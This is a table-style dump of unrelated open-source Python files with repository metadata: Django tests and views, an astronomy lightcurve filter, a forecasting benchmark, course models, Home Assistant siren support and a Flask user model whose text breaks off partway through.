text stringlengths 4 1.02M | meta dict |
|---|---|
import copy
import os
from io import StringIO
from unittest.mock import MagicMock
from django.core.management import call_command
from django.test import TestCase
from data_refinery_common.models import (
OriginalFile,
ProcessorJobOriginalFileAssociation,
SurveyJob,
ProcessorJob,
Sample,
OriginalFileSampleAssociation,
Organism
)
from django.utils import timezone
from data_refinery_workers.processors import utils
def prepare_job():
    """Build the fixture graph used by the start_job tests.

    Creates a ProcessorJob for the AFFY_TO_PCL pipeline, an OriginalFile,
    the job<->file association, an unprocessed C. elegans Sample, and the
    file<->sample association, then returns the job.
    """
    job = ProcessorJob()
    job.pipeline_applied = "AFFY_TO_PCL"
    job.save()

    og_file = OriginalFile()
    og_file.source_filename = "ftp://ftp.ebi.ac.uk/pub/databases/microarray/data/experiment/GEOD/E-GEOD-59071/E-GEOD-59071.raw.3.zip"
    og_file.filename = "GSM1426071_CD_colon_active_1.CEL"
    og_file.absolute_file_path = "/home/user/data_store/raw/TEST/CEL/GSM1426071_CD_colon_active_1.CEL"
    og_file.save()

    job_file_assoc = ProcessorJobOriginalFileAssociation()
    job_file_assoc.original_file = og_file
    job_file_assoc.processor_job = job
    job_file_assoc.save()

    organism = Organism.get_object_for_name("CAENORHABDITIS_ELEGANS")

    sample = Sample()
    sample.title = "Heyo"
    sample.organism = organism
    sample.is_processed = False
    sample.save()

    file_sample_assoc = OriginalFileSampleAssociation()
    file_sample_assoc.sample = sample
    file_sample_assoc.original_file = og_file
    file_sample_assoc.save()

    return job
class StartJobTestCase(TestCase):
    """Tests for utils.start_job / utils.end_job."""

    def test_success(self):
        """A job with an associated file and sample starts and ends cleanly."""
        processor_job = prepare_job()
        job_context = utils.start_job({"job": processor_job})
        # start_job preserves the "job" key
        self.assertEqual(job_context["job"], processor_job)
        job_context['success'] = True
        job_context = utils.end_job(job_context)
        # end_job marks every associated sample as processed.
        for sample in job_context['samples']:
            self.assertTrue(sample.is_processed)

    def test_failure(self):
        """Fails because there are no files for the job."""
        processor_job = ProcessorJob()
        processor_job.save()
        job_context = utils.start_job({"job": processor_job})
        self.assertFalse(job_context["success"])

    def test_bad_restart(self):
        """Restarting an already-started job while in the cloud should raise."""
        with self.settings(RUNNING_IN_CLOUD=True):
            job = ProcessorJob()
            job.start_time = timezone.now()
            job.success = True
            job.save()
            job_context = utils.start_job({"job": job})
            job = ProcessorJob()
            job.start_time = timezone.now()
            job.success = False
            job.save()
            job_context = utils.start_job({"job": job})
            # BUG FIX: the original called
            #   self.assertRaises(utils.start_job({"job": job}))
            # which invokes start_job first and passes its *result* to
            # assertRaises, so nothing was ever asserted.  Use the
            # context-manager form so the exception is actually checked.
            # NOTE(review): narrow Exception to the concrete type raised
            # by utils.start_job once confirmed.
            with self.assertRaises(Exception):
                utils.start_job({"job": job})
class RunPipelineTestCase(TestCase):
    """Tests for utils.run_pipeline."""

    def test_no_job(self):
        """run_pipeline does nothing when the job id does not exist."""
        fake_processor = MagicMock()
        utils.run_pipeline({"job_id": 100}, [fake_processor])
        fake_processor.assert_not_called()

    def test_processor_failure(self):
        """A processor returning success=False ends the job as failed."""
        processor_job = ProcessorJob()
        processor_job.save()
        job_context = {
            "job_id": processor_job.id,
            "job": processor_job,
            "batches": [],
        }
        failing_processor = MagicMock()
        failing_processor.__name__ = "Fake processor."
        failed_context = copy.copy(job_context)
        failed_context["success"] = False
        failing_processor.return_value = failed_context
        utils.run_pipeline(job_context, [failing_processor])
        self.assertEqual(failing_processor.call_count, 1)
        processor_job.refresh_from_db()
        self.assertFalse(processor_job.success)
        self.assertIsNotNone(processor_job.end_time)
| {
"content_hash": "fa5a827eb5f87fe1388e7c3458183873",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 139,
"avg_line_length": 31.182608695652174,
"alnum_prop": 0.6427774679308421,
"repo_name": "data-refinery/data_refinery",
"id": "5201a853b9230711b63ef9d51e32ba27c6702823",
"size": "3586",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workers/data_refinery_workers/processors/test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HCL",
"bytes": "15276"
},
{
"name": "Python",
"bytes": "307545"
},
{
"name": "R",
"bytes": "4988"
},
{
"name": "Shell",
"bytes": "9338"
}
],
"symlink_target": ""
} |
# Interactive lightcurve flattening tool (Python 2 code: raw_input,
# print statement, string-module functions, pylab load/save).
# Loads a lightcurve, resamples it to uniform time spacing, high-pass
# filters it with a Chebyshev type-I IIR filter, optionally plots the
# stages, and saves (time, filtered, residual) columns.
import scipy.signal as signal
import scipy.interpolate as interpolate
import pylab as pl
import astronomy as ast
import os
import string
# List the files in the working directory and ask which one to open and
# which columns hold time and magnitude (1-based indices).
os.system('ls -l')
filename = raw_input('Open which file ? : ')
os.system('less %s' % filename)
cols = string.split(raw_input('Use which columns ? : '))
# load a lightcurve
X = pl.load(filename)
x = X[:,int(cols[0])-1]
# Convert magnitudes to relative flux: flux = 10^(-mag / 2.5), then
# normalise to a mean of 1.
y = 10**(X[:,int(cols[1])-1]/(-2.5))
y /= pl.average(y)
#y = X[:,int(cols[1])-1]
# we must interpolate this lightcurve to the minimum time spacing throughout
xnew,ynew = ast.signal.resample(x,y)
# subtract the first magnitude from lightcurve to avoid funny edge effects
ynew -= ynew[0]
dt = xnew[1]-xnew[0]
# now create filter coefficients
# filter parameters
# fp/fs: passband/stopband edge frequencies (cycles per time unit);
# wp/ws are those edges normalised to the Nyquist frequency 1/(2*dt).
fp = 500.0
fs = 400.0
wp = fp*pl.pi*dt*2.0/pl.pi
ws = fs*pl.pi*dt*2.0/pl.pi
gpass = 0.1
gstop = 20
ftype = 'cheby1'
#print wp
#print ws
# calculate filter coefficients and filter the lightcurve
b,a = signal.iirdesign(wp,ws,gpass,gstop,ftype=ftype)
yf = signal.lfilter(b,a,ynew)
yesno = raw_input('Plot results [y] ?')
if yesno == 'y' or yesno =='Y' or yesno == '':
    # plot some stuff
    # Panels: filtered lightcurve, resampled input, DFT amplitude
    # spectrum of the filtered curve, and the filter frequency response.
    pl.figure(figsize=(9,12))
    pl.subplot(411)
    pl.plot(xnew,yf,'.')
    #yl = pl.ylim()
    #pl.ylim(yl[1],yl[0])
    pl.subplot(412)
    pl.plot(xnew,ynew,'.')
    #yl = pl.ylim()
    #pl.ylim(yl[1],yl[0])
    pl.subplot(413)
    freq,amp = ast.signal.dft(xnew,yf,0,0.5/dt,1)
    pl.plot(freq,amp)
    pl.subplot(414)
    w,h = signal.freqs(b,a)
    pl.plot(w,h)
    pl.show()
# save lightcurve
# Output columns: time, filtered flux, residual (input minus filtered).
temp = []
temp.append(xnew)
temp.append(yf)
temp.append(ynew-yf)
outfilename = string.strip(raw_input('Enter output filename [%s_FF.dat] : ' % filename[:-4]))
if outfilename == '':
    filename = '%s_FF.dat' % filename[:-4]
else:
    filename = outfilename
print 'Saving to %s' % filename
pl.save(filename,pl.array(temp).transpose())
| {
"content_hash": "e5ec3e4f0c58cf7fa3ce6f56c50355e5",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 93,
"avg_line_length": 21.57471264367816,
"alnum_prop": 0.6435801811401172,
"repo_name": "ezietsman/msc-thesis",
"id": "6acb90c9f8f0cebcab268901133087549b89fe0f",
"size": "1936",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "z_cha/flatten.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "246700"
}
],
"symlink_target": ""
} |
# Generated pyaf benchmark script: run one artificial-dataset forecast.
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
# 32-point daily series, MovingMedian trend, Integration transform,
# AR order 12, no cycle, no noise, no exogenous variables.
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "MovingMedian", cycle_length = 0, transform = "Integration", sigma = 0.0, exog_count = 0, ar_order = 12);
"content_hash": "7e48aa427d25264722cae7ae6a09eb29",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 168,
"avg_line_length": 38.285714285714285,
"alnum_prop": 0.7089552238805971,
"repo_name": "antoinecarme/pyaf",
"id": "cacbabfbe9d24e7b268f7b98fca9c8703ffbecdd",
"size": "268",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/artificial/transf_Integration/trend_MovingMedian/cycle_0/ar_12/test_artificial_32_Integration_MovingMedian_0_12_0.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "6773299"
},
{
"name": "Procfile",
"bytes": "24"
},
{
"name": "Python",
"bytes": "54209093"
},
{
"name": "R",
"bytes": "807"
},
{
"name": "Shell",
"bytes": "3619"
}
],
"symlink_target": ""
} |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseBadRequest,\
HttpResponseForbidden
from bootcamp.feeds.models import Feed
from bootcamp.activities.models import Activity
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.template.loader import render_to_string
from django.template.context_processors import csrf
import json
from django.contrib.auth.decorators import login_required
from bootcamp.decorators import ajax_required
FEEDS_NUM_PAGES = 10
@login_required
def feeds(request):
    """Render the first page of the feeds stream for the current user."""
    # BUG FIX: removed leftover Python-2 debug `print` statements
    # ("feeds views" and the page object) that polluted stdout and are
    # a syntax error on Python 3.
    all_feeds = Feed.get_feeds()
    paginator = Paginator(all_feeds, FEEDS_NUM_PAGES)
    feeds = paginator.page(1)
    # Remember the newest feed id on the page so the client can poll for
    # newer items; -1 means the stream is empty.
    from_feed = -1
    if feeds:
        from_feed = feeds[0].id
    return render(request, 'feeds/feeds.html', {
        'feeds': feeds,
        'from_feed': from_feed,
        'page': 1,
    })
def feed(request, pk):
    """Render the detail page for a single feed item."""
    feed_item = get_object_or_404(Feed, pk=pk)
    return render(request, 'feeds/feed.html', {'feed': feed_item})
@login_required
@ajax_required
def load(request):
    # AJAX endpoint: return rendered HTML for one page of feeds older
    # than `from_feed`, optionally filtered to a single user's feeds.
    from_feed = request.GET.get('from_feed')
    page = request.GET.get('page')
    feed_source = request.GET.get('feed_source')
    all_feeds = Feed.get_feeds(from_feed)
    if feed_source != 'all':
        all_feeds = all_feeds.filter(user__id=feed_source)
    paginator = Paginator(all_feeds, FEEDS_NUM_PAGES)
    try:
        feeds = paginator.page(page)
    except PageNotAnInteger:
        return HttpResponseBadRequest()
    except EmptyPage:
        # Past the last page: return an empty body rather than an error.
        feeds = []
    html = u''
    # Python 2 builtin `unicode`.  The CSRF token is injected by hand
    # because the partial is rendered without a RequestContext.
    csrf_token = unicode(csrf(request)['csrf_token'])
    for feed in feeds:
        html = u'{0}{1}'.format(html,
                                render_to_string('feeds/partial_feed.html',
                                                 {
                                                     'feed': feed,
                                                     'user': request.user,
                                                     'csrf_token': csrf_token
                                                 }))
    return HttpResponse(html)
def _html_feeds(last_feed, user, csrf_token, feed_source='all'):
    """Render every feed newer than ``last_feed`` and return the markup.

    When ``feed_source`` is not ``'all'`` only feeds from that user id
    are included.
    """
    new_feeds = Feed.get_feeds_after(last_feed)
    if feed_source != 'all':
        new_feeds = new_feeds.filter(user__id=feed_source)
    fragments = []
    for item in new_feeds:
        fragments.append(render_to_string('feeds/partial_feed.html', {
            'feed': item,
            'user': user,
            'csrf_token': csrf_token,
        }))
    return u''.join(fragments)
@login_required
@ajax_required
def load_new(request):
    # AJAX endpoint: return rendered HTML for every feed posted after
    # `last_feed` so the client can prepend them to the stream.
    last_feed = request.GET.get('last_feed')
    user = request.user
    # Python 2 builtin `unicode`.
    csrf_token = unicode(csrf(request)['csrf_token'])
    html = _html_feeds(last_feed, user, csrf_token)
    return HttpResponse(html)
@login_required
@ajax_required
def check(request):
    """AJAX endpoint: report how many feeds are newer than ``last_feed``."""
    last_feed = request.GET.get('last_feed')
    feed_source = request.GET.get('feed_source')
    newer = Feed.get_feeds_after(last_feed)
    if feed_source != 'all':
        newer = newer.filter(user__id=feed_source)
    return HttpResponse(newer.count())
@login_required
@ajax_required
def post(request):
    # AJAX endpoint: create a new feed from the POSTed text, then return
    # HTML for every feed newer than `last_feed` (including the new one)
    # so the client can prepend them.
    last_feed = request.POST.get('last_feed')
    user = request.user
    # Python 2 builtin `unicode`.
    csrf_token = unicode(csrf(request)['csrf_token'])
    feed = Feed()
    feed.user = user
    post = request.POST['post']
    post = post.strip()
    if len(post) > 0:
        # Posts are capped at 255 characters; empty posts are ignored.
        feed.post = post[:255]
        feed.save()
    html = _html_feeds(last_feed, user, csrf_token)
    return HttpResponse(html)
@login_required
@ajax_required
def like(request):
    # AJAX endpoint: toggle the current user's like on a feed and return
    # the updated like count.
    feed_id = request.POST['feed']
    feed = Feed.objects.get(pk=feed_id)
    user = request.user
    like = Activity.objects.filter(activity_type=Activity.LIKE, feed=feed_id,
                                   user=user)
    if like:
        # Already liked: withdraw the like and its notification.
        user.profile.unotify_liked(feed)
        like.delete()
    else:
        like = Activity(activity_type=Activity.LIKE, feed=feed_id, user=user)
        like.save()
        user.profile.notify_liked(feed)
    return HttpResponse(feed.calculate_likes())
@login_required
@ajax_required
def comment(request):
    # POST: add a comment to a feed and notify interested users.
    # GET: just re-render the feed's comment list.
    if request.method == 'POST':
        feed_id = request.POST['feed']
        feed = Feed.objects.get(pk=feed_id)
        post = request.POST['post']
        post = post.strip()
        if len(post) > 0:
            # Comments are capped at 255 characters; empty ones ignored.
            post = post[:255]
            user = request.user
            feed.comment(user=user, post=post)
            user.profile.notify_commented(feed)
            user.profile.notify_also_commented(feed)
        return render(request, 'feeds/partial_feed_comments.html',
                      {'feed': feed})
    else:
        feed_id = request.GET.get('feed')
        feed = Feed.objects.get(pk=feed_id)
        return render(request, 'feeds/partial_feed_comments.html',
                      {'feed': feed})
@login_required
@ajax_required
def update(request):
    # AJAX endpoint: return the current like/comment counts for every
    # feed visible on the client (ids between last_feed and first_feed)
    # as a JSON object keyed by feed pk.
    first_feed = request.GET.get('first_feed')
    last_feed = request.GET.get('last_feed')
    feed_source = request.GET.get('feed_source')
    feeds = Feed.get_feeds().filter(id__range=(last_feed, first_feed))
    if feed_source != 'all':
        feeds = feeds.filter(user__id=feed_source)
    dump = {}
    for feed in feeds:
        dump[feed.pk] = {'likes': feed.likes, 'comments': feed.comments}
    data = json.dumps(dump)
    return HttpResponse(data, content_type='application/json')
@login_required
@ajax_required
def track_comments(request):
    """AJAX endpoint: re-render the comment list for one feed."""
    tracked = Feed.objects.get(pk=request.GET.get('feed'))
    return render(request, 'feeds/partial_feed_comments.html', {'feed': tracked})
@login_required
@ajax_required
def remove(request):
    # AJAX endpoint: delete one of the current user's own feeds together
    # with its likes, then refresh the parent's comment counter.
    try:
        feed_id = request.POST.get('feed')
        feed = Feed.objects.get(pk=feed_id)
        if feed.user == request.user:
            likes = feed.get_likes()
            parent = feed.parent
            for like in likes:
                like.delete()
            feed.delete()
            if parent:
                # The deleted feed was a comment: recount the parent's.
                parent.calculate_comments()
            return HttpResponse()
        else:
            return HttpResponseForbidden()
    except Exception, e:
        # Python 2 except syntax.  NOTE(review): this broad handler also
        # swallows programming errors; narrowing it to Feed.DoesNotExist
        # would be safer -- confirm no other failure mode is expected.
        return HttpResponseBadRequest()
| {
"content_hash": "8c192b358af620e815cc2c70bce5768a",
"timestamp": "",
"source": "github",
"line_count": 211,
"max_line_length": 78,
"avg_line_length": 30.924170616113745,
"alnum_prop": 0.5750191570881226,
"repo_name": "okwow123/freebaram",
"id": "a64f8ce9196cb0799dd4b140c724cfc4776b87d8",
"size": "6525",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bootcamp/feeds/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10357"
},
{
"name": "HTML",
"bytes": "63691"
},
{
"name": "JavaScript",
"bytes": "101494"
},
{
"name": "Python",
"bytes": "99135"
},
{
"name": "Shell",
"bytes": "72"
}
],
"symlink_target": ""
} |
import os
import sys
import requests
import hashlib
import json
class download_if_changed(object):
    """Pipeline processor: download ``url`` and overwrite ``filename``
    only when the content differs from what is on disk (MD5 compare),
    then write 'OK' to ``output``.

    Python 2 code: uses the ``file`` builtin for I/O.
    """
    def process(self,input,output,url,filename):
        # `input` is unused here; presumably part of a processor
        # interface shared by all pipeline steps -- TODO confirm.
        data = requests.get(url).content
        data_hash = hashlib.md5(data).hexdigest()
        current = ""
        try:
            current = file(filename).read()
        except:
            # Missing file (first download): treat as empty content.
            pass
        current_hash = hashlib.md5(current).hexdigest()
        if current_hash != data_hash:
            file(filename,'w').write(data)
        file(output,'w').write('OK')
| {
"content_hash": "3e9b93b877c9c2c9a99d75cd40b31203",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 55,
"avg_line_length": 27.63157894736842,
"alnum_prop": 0.6,
"repo_name": "OpenBudget/open-budget-data",
"id": "c77e77dc8e04498fea3c9c37bc72e93fb014381e",
"size": "542",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "processors/download_if_changed.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "16595226"
},
{
"name": "Python",
"bytes": "309862"
}
],
"symlink_target": ""
} |
from datetime import datetime
from django.db import models
from django.utils.http import urlquote
attachment_url_format = 'https://www.ccxp.nthu.edu.tw/ccxp/INQUIRE/JH/output/6_6.1_6.1.12/%s.pdf' # noqa
class Course(models.Model):
    """Course database schema"""
    # Unique course number: the natural key used to build the PDF URL.
    no = models.CharField(max_length=20, unique=True, db_index=True)
    code = models.CharField(max_length=20, blank=True)
    eng_title = models.CharField(max_length=200, blank=True)
    chi_title = models.CharField(max_length=200, blank=True)
    note = models.TextField(blank=True)
    objective = models.CharField(max_length=80, blank=True)
    time = models.CharField(max_length=20, blank=True)
    time_token = models.CharField(max_length=20, blank=True)
    teacher = models.CharField(max_length=40, blank=True)  # Only save Chinese
    room = models.CharField(max_length=80, blank=True)
    credit = models.IntegerField(default=0)
    limit = models.IntegerField(default=0)
    prerequisite = models.BooleanField(default=False, blank=True)
    # Presumably a year/semester token -- TODO confirm the format.
    ys = models.CharField(max_length=10, blank=True)
    ge = models.CharField(max_length=80, blank=True)
    # Hit counter for the course page.
    hit = models.IntegerField(default=0)
    syllabus = models.TextField(blank=True)  # pure text
    has_attachment = models.BooleanField(default=False)  # has pdf

    def __str__(self):
        return self.no

    @property
    def attachment_url(self):
        # Syllabus PDF hosted on the university server, keyed by `no`.
        return attachment_url_format % urlquote(self.no)
class Department(models.Model):
    """A department and the courses it requires."""
    dept_name = models.CharField(max_length=20, blank=True)
    required_course = models.ManyToManyField(Course, blank=True)
    # Presumably a year/semester token -- TODO confirm the format.
    ys = models.CharField(max_length=10, blank=True)

    def __unicode__(self):
        return self.dept_name

    # Consistency fix: the sibling Course model defines __str__, but this
    # model only defined __unicode__, which Python 3 ignores -- instances
    # would render with the default "Department object" repr.  Alias it
    # so str() matches Course's behavior; __unicode__ is kept unchanged.
    __str__ = __unicode__
class Announcement(models.Model):
    """Site announcement with a severity/category tag."""
    TAG_CHOICE = (
        ('Info', '公告'),
        ('Bug', '已知問題'),
        ('Fix', '問題修復'),
    )
    content = models.TextField(blank=True)
    time = models.DateTimeField(default=datetime.now)
    tag = models.CharField(max_length=10, choices=TAG_CHOICE, default='Info')

    def __unicode__(self):
        return '%s|%s' % (self.time, self.tag)

    # Consistency fix: Course defines __str__ while this model only had
    # __unicode__ (ignored on Python 3).  Alias so str() shows the same
    # "time|tag" text; __unicode__ is kept unchanged.
    __str__ = __unicode__
class FlatPrerequisite(models.Model):
    '''
    store rendered prerequisite in the database
    alternative: django.contrib.flatpage
    '''
    updated_at = models.DateTimeField(auto_now=True)
    html = models.TextField()

    @classmethod
    def update_html(cls, html):
        # Singleton-style storage: the table holds at most one row,
        # which is updated in place if it already exists.
        if cls.objects.exists():
            ins = cls.objects.get()
            ins.html = html
            ins.save()
            return ins
        else:
            return cls.objects.create(html=html)
| {
"content_hash": "5767f11af7351c87624a1e0480c00bbc",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 105,
"avg_line_length": 32.25,
"alnum_prop": 0.6655038759689923,
"repo_name": "leVirve/NTHU_Course",
"id": "1d9d8c957b9a6a117c45a6b6a1b92f637e51b0f0",
"size": "2625",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data_center/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "61977"
},
{
"name": "HTML",
"bytes": "35840"
},
{
"name": "JavaScript",
"bytes": "16495"
},
{
"name": "Python",
"bytes": "57040"
},
{
"name": "Shell",
"bytes": "17"
}
],
"symlink_target": ""
} |
"""Support for RFXtrx sirens."""
from __future__ import annotations
from typing import Any
import RFXtrx as rfxtrxmod
from homeassistant.components.siren import (
SUPPORT_TONES,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SirenEntity,
)
from homeassistant.components.siren.const import ATTR_TONE
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_call_later
from . import (
DEFAULT_OFF_DELAY,
DeviceTuple,
RfxtrxCommandEntity,
async_setup_platform_entry,
)
from .const import CONF_OFF_DELAY
SUPPORT_RFXTRX = SUPPORT_TURN_ON | SUPPORT_TONES
SECURITY_PANIC_ON = "Panic"
SECURITY_PANIC_OFF = "End Panic"
SECURITY_PANIC_ALL = {SECURITY_PANIC_ON, SECURITY_PANIC_OFF}
def supported(event: rfxtrxmod.RFXtrxEvent):
    """Return whether an event supports sirens."""
    device = event.device
    # Chimes always qualify.
    if isinstance(device, rfxtrxmod.ChimeDevice):
        return True
    # Security sensors qualify only when they report a panic status.
    is_panic_sensor = (
        isinstance(device, rfxtrxmod.SecurityDevice)
        and isinstance(event, rfxtrxmod.SensorEvent)
        and event.values["Sensor Status"] in SECURITY_PANIC_ALL
    )
    return is_panic_sensor
def get_first_key(data: dict[int, str], entry: str) -> int:
    """Find a key based on the items value."""
    # Linear scan in insertion order; raises StopIteration when no
    # value matches, exactly like the original next()-based form.
    for key, value in data.items():
        if value == entry:
            return key
    raise StopIteration
async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback,
) -> None:
    """Set up config entry."""

    def _constructor(
        event: rfxtrxmod.RFXtrxEvent,
        auto: rfxtrxmod.RFXtrxEvent | None,
        device_id: DeviceTuple,
        entity_info: dict,
    ):
        """Construct a entity from an event."""
        device = event.device
        # Chime devices become RfxtrxChime entities.
        if isinstance(device, rfxtrxmod.ChimeDevice):
            return [
                RfxtrxChime(
                    event.device,
                    device_id,
                    entity_info.get(CONF_OFF_DELAY, DEFAULT_OFF_DELAY),
                    auto,
                )
            ]
        # Security sensors reporting panic status become panic sirens.
        if isinstance(device, rfxtrxmod.SecurityDevice) and isinstance(
            event, rfxtrxmod.SensorEvent
        ):
            if event.values["Sensor Status"] in SECURITY_PANIC_ALL:
                return [
                    RfxtrxSecurityPanic(
                        event.device,
                        device_id,
                        entity_info.get(CONF_OFF_DELAY, DEFAULT_OFF_DELAY),
                        auto,
                    )
                ]
        # Falls through (returns None) for unsupported devices; those
        # are filtered out beforehand by `supported`.

    await async_setup_platform_entry(
        hass, config_entry, async_add_entities, supported, _constructor
    )
class RfxtrxOffDelayMixin(Entity):
    """Mixin to support timeouts on data.

    Many 433 devices only send data when active. They will
    repeatedly (every x seconds) send a command to indicate
    being active and stop sending this command when inactive.

    This mixin allow us to keep track of the timeout once
    they go inactive.
    """

    # Cancel callback for the pending off-delay timer; None when no
    # timer is running.  Entities treat "timer running" as "is_on".
    _timeout: CALLBACK_TYPE | None = None
    # Seconds to stay "on" after the last event; falsy disables the timer.
    _off_delay: float | None = None

    def _setup_timeout(self):
        # Schedule the entity state to flip back off after _off_delay.
        @callback
        def _done(_):
            self._timeout = None
            self.async_write_ha_state()

        if self._off_delay:
            self._timeout = async_call_later(self.hass, self._off_delay, _done)

    def _cancel_timeout(self):
        # Cancel any pending off-delay timer.
        if self._timeout:
            self._timeout()
            self._timeout = None
class RfxtrxChime(RfxtrxCommandEntity, SirenEntity, RfxtrxOffDelayMixin):
    """Representation of a RFXtrx chime."""

    _device: rfxtrxmod.ChimeDevice

    def __init__(self, device, device_id, off_delay=None, event=None):
        """Initialize the entity."""
        super().__init__(device, device_id, event)
        self._attr_available_tones = list(self._device.COMMANDS.values())
        self._attr_supported_features = SUPPORT_TURN_ON | SUPPORT_TONES
        # Fall back to the device's first command when no tone is given.
        self._default_tone = next(iter(self._device.COMMANDS))
        self._off_delay = off_delay

    @property
    def is_on(self):
        """Return true if device is on."""
        # "On" means the off-delay timer from the mixin is still running.
        return self._timeout is not None

    async def async_turn_on(self, **kwargs):
        """Turn the device on."""
        self._cancel_timeout()
        if tone := kwargs.get(ATTR_TONE):
            # Map the human-readable tone name back to its command code.
            command = get_first_key(self._device.COMMANDS, tone)
        else:
            command = self._default_tone
        await self._async_send(self._device.send_command, command)
        self._setup_timeout()
        self.async_write_ha_state()

    def _apply_event(self, event: rfxtrxmod.ControlEvent):
        """Apply a received event."""
        super()._apply_event(event)
        sound = event.values.get("Sound")
        if sound is not None:
            # Any sound event restarts the off-delay window.
            self._cancel_timeout()
            self._setup_timeout()

    @callback
    def _handle_event(self, event, device_id):
        """Check if event applies to me and update."""
        if self._event_applies(event, device_id):
            self._apply_event(event)
            self.async_write_ha_state()
class RfxtrxSecurityPanic(RfxtrxCommandEntity, SirenEntity, RfxtrxOffDelayMixin):
    """Representation of a security device."""

    _device: rfxtrxmod.SecurityDevice

    def __init__(self, device, device_id, off_delay=None, event=None):
        """Initialize the entity."""
        super().__init__(device, device_id, event)
        self._attr_supported_features = SUPPORT_TURN_ON | SUPPORT_TURN_OFF
        # Resolve the numeric status codes for panic start/stop once.
        self._on_value = get_first_key(self._device.STATUS, SECURITY_PANIC_ON)
        self._off_value = get_first_key(self._device.STATUS, SECURITY_PANIC_OFF)
        self._off_delay = off_delay

    @property
    def is_on(self):
        """Return true if device is on."""
        # "On" means the off-delay timer from the mixin is still running.
        return self._timeout is not None

    async def async_turn_on(self, **kwargs: Any):
        """Turn the device on."""
        self._cancel_timeout()
        await self._async_send(self._device.send_status, self._on_value)
        self._setup_timeout()
        self.async_write_ha_state()

    async def async_turn_off(self, **kwargs: Any) -> None:
        """Turn the device off."""
        self._cancel_timeout()
        await self._async_send(self._device.send_status, self._off_value)
        self.async_write_ha_state()

    def _apply_event(self, event: rfxtrxmod.SensorEvent):
        """Apply a received event."""
        super()._apply_event(event)
        status = event.values.get("Sensor Status")
        if status == SECURITY_PANIC_ON:
            # Panic started (or repeated): restart the off-delay window.
            self._cancel_timeout()
            self._setup_timeout()
        elif status == SECURITY_PANIC_OFF:
            self._cancel_timeout()

    @callback
    def _handle_event(self, event, device_id):
        """Check if event applies to me and update."""
        if self._event_applies(event, device_id):
            self._apply_event(event)
            self.async_write_ha_state()
| {
"content_hash": "2d2818c272def90480d35973f5c5b81b",
"timestamp": "",
"source": "github",
"line_count": 234,
"max_line_length": 81,
"avg_line_length": 30.286324786324787,
"alnum_prop": 0.6160575701989558,
"repo_name": "GenericStudent/home-assistant",
"id": "9a4a475998da378253c1095388374a484474203c",
"size": "7087",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/rfxtrx/siren.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3070"
},
{
"name": "Python",
"bytes": "44491729"
},
{
"name": "Shell",
"bytes": "5092"
}
],
"symlink_target": ""
} |
"""
Conjunto de modelos relacionais para o controle da app (Usuarios, auditorias, logs, etc)
Os modelos do catálogo do OPAC (periódicos, números, artigos) estão definidos na
lib: opac_schema (ver requirements.txt)
"""
import os
from sqlalchemy.event import listens_for
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy_utils.types.choice import ChoiceType
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from flask import current_app
from webapp.utils import thumbgen_filename
from . import dbsql as db
from . import login_manager
from . import notifications
LANGUAGES_CHOICES = [
('pt', 'Português'),
('en', 'English'),
('es', 'Español'),
]
class User(UserMixin, db.Model):
    """Application user.  The password is stored only as a salted hash."""
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(120), nullable=False, unique=True)
    # Nullable: it must be possible to add a new user without a password.
    _password = db.Column(db.String(128), nullable=True)
    email_confirmed = db.Column(db.Boolean, nullable=False, default=False)

    @hybrid_property
    def password(self):
        return self._password

    @password.setter
    def _set_password(self, plaintext):
        # Never store the plaintext; hash on assignment.
        self._password = generate_password_hash(plaintext)

    def is_correct_password(self, plaintext):
        """
        Compare ``plaintext`` against the hashed password stored for
        this user.
        """
        if not self._password:
            return False
        else:
            return check_password_hash(self._password, plaintext)

    def send_confirmation_email(self):
        """Send the address-confirmation email.

        Raises ValueError when the user has no valid email address.
        """
        if not self._check_valid_email():
            raise ValueError('Usuário deve ter email válido para realizar o envío')
        else:
            return notifications.send_confirmation_email(self.email)

    def send_reset_password_email(self):
        """Send the password-reset email.

        Raises ValueError when the user has no valid email address.
        """
        if not self._check_valid_email():
            raise ValueError('Usuário deve ter email válido para realizar o envío')
        else:
            return notifications.send_reset_password_email(self.email)

    def _check_valid_email(self):
        """
        Return True when this user instance has a valid email address,
        False otherwise.
        """
        # Imported here to avoid a circular import at module load time.
        from webapp.admin.forms import EmailForm
        # BUG FIX: the original tested ``self.email == ''`` twice in a
        # row; ``not self.email`` already covers None and the empty
        # string, so the behavior is unchanged.
        if not self.email:
            return False
        form = EmailForm(data={'email': self.email})
        return form.validate()

    # Required for administrative interface
